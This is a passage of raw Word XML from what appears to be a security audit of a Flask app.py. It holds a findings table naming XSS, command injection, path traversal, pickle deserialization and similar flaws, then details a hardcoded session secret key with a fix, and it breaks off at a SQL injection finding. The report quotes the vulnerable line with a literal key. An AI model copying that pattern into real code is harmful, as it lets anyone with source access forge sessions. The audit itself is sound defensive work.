            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:46</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Session Cookie Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D68910"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-614</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:56</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Cross-Site Scripting (Template Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:73</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Insecure Deserialization (pickle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-502</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:109</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Broken Access Control (client-trusted role)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:119</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="700"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">#10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">Debug Mode Enabled in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D68910"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-489</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="EDF2F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="222222"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py:127</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Detailed Findings and Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hardcoded Secret Key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E86C1"/>
        </w:rPr>
        <w:t xml:space="preserve">Low   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   CWE: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CWE-798: Use of Hard-coded Credentials   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">   Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">app.py, line 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Flask session-signing secret_key is a fixed string committed directly in source code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Anyone with source access (e.g. via a public GitHub repo) can forge or tamper with session cookies, potentially impersonating any user.</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app.secret_key = "s3cr3t_dev_key_123"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Load secrets from environment variables or a secrets manager (AWS Secrets Manager, Vault, etc.), never from source. Fail startup loudly if the variable is missing so misconfiguration is caught immediately.</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app.secret_key = os.environ.get("FLASK_SECRET_KEY")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if not app.secret_key:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise RuntimeError("FLASK_SECRET_KEY environment variable must be set")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding #2  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D68910"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium   </w:t>
      </w:r>
